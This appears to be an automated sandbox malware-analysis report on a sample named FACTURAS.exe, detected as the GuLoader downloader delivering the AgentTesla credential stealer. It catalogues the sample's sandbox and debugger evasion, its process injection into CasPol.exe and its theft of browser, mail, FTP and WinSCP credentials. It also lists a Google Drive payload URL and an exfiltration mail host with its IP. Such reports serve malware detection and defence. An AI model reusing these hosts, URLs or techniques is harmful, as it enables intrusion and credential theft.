            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\FACTURAS.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\FACTURAS.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: FACTURAS.exe, 00000000.00000002.2777688692.00000000005BD000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=150165GSKZ9-M3FAHFFVN26GKULRYSZPU
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3996Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0041724F rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9948
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\FACTURAS.exeSystem information queried: ModuleInformation
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu
            Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW8
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: FACTURAS.exe, 00000000.00000002.2777688692.00000000005BD000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\FACTURAS.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0041724F rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00936950 KiUserExceptionDispatcher,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\FACTURAS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C20000
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1028, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1028, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1028, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery431Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 527918 Sample: FACTURAS.exe Startdate: 24/11/2021 Architecture: WINDOWS Score: 100 21 mail.furteksdokuma.com.tr 2->21 23 furteksdokuma.com.tr 2->23 25 3 other IPs or domains 2->25 33 Found malware configuration 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected GuLoader 2->37 39 3 other signatures 2->39 8 FACTURAS.exe 1 2->8         started        11 UserOOBEBroker.exe 2->11         started        signatures3 process4 signatures5 41 Writes to foreign memory regions 8->41 43 Tries to detect Any.run 8->43 45 Hides threads from debuggers 8->45 13 CasPol.exe 11 8->13         started        17 CasPol.exe 8->17         started        process6 dnsIp7 27 furteksdokuma.com.tr 116.202.203.61, 49806, 587 HETZNER-ASDE Germany 13->27 29 drive.google.com 142.250.184.206, 443, 49792 GOOGLEUS United States 13->29 31 googlehosted.l.googleusercontent.com 172.217.16.129, 443, 49793 GOOGLEUS United States 13->31 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->47 49 Tries to steal Mail credentials (via file / registry access) 13->49 51 Tries to harvest and steal ftp login credentials 13->51 57 3 other signatures 13->57 19 conhost.exe 13->19         started        53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->53 55 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 17->55 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            FACTURAS.exe27%VirustotalBrowse
            FACTURAS.exe16%ReversingLabsWin32.Downloader.GuLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            furteksdokuma.com.tr0%VirustotalBrowse
            mail.furteksdokuma.com.tr0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.microso0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%VirustotalBrowse
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://8AH9aWyWzTn3yBDLZw.net0%Avira URL Cloudsafe
            http://furteksdokuma.com.tr0%Avira URL Cloudsafe
            http://mail.furteksdokuma.com.tr0%Avira URL Cloudsafe
            http://kFWRbv.com0%Avira URL Cloudsafe
            http://8AH9aWyWzTn3yBDLZw.nett-0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.184.206
            truefalse
              high
              googlehosted.l.googleusercontent.com
              172.217.16.129
              truefalse
                high
                furteksdokuma.com.tr
                116.202.203.61
                truetrueunknown
                doc-08-5k-docs.googleusercontent.com
                unknown
                unknownfalse
                  high
                  mail.furteksdokuma.com.tr
                  unknown
                  unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-08-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp3ceb3h105f6050578iidjo4j/1637764800000/06007705055686197661/*/150165GSkz9-m3FahfFvn26gkuLRySZPu?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.microsoUserOOBEBroker.exe, 00000015.00000002.7333160812.000001EB84730000.00000002.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSCasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://doc-08-5k-docs.googleusercontent.com/CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpfalse
                      high
                      https://sectigo.com/CPS0CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmpfalse
                        high
                        http://8AH9aWyWzTn3yBDLZw.netCasPol.exe, 0000000D.00000002.7350801578.000000001DE28000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7351132420.000000001DE62000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7351187881.000000001DE6A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 0000000D.00000002.7350383503.000000001DDD8000.00000004.00000001.sdmpfalse
                          high
                          http://furteksdokuma.com.trCasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://doc-08-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhpCasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7337234857.0000000001061000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000003.2754982414.0000000001043000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpfalse
                            high
                            https://doc-08-5k-docs.googleusercontent.com/_CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmpfalse
                              high
                              http://mail.furteksdokuma.com.trCasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://kFWRbv.comCasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://8AH9aWyWzTn3yBDLZw.nett-CasPol.exe, 0000000D.00000002.7350801578.000000001DE28000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              https://doc-08-5k-docs.googleusercontent.com/yCasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpfalse
                                high
                                https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                172.217.16.129
                                googlehosted.l.googleusercontent.comUnited States
                                15169GOOGLEUSfalse
                                142.250.184.206
                                drive.google.comUnited States
                                15169GOOGLEUSfalse
                                116.202.203.61
                                furteksdokuma.com.trGermany
                                24940HETZNER-ASDEtrue

                                General Information

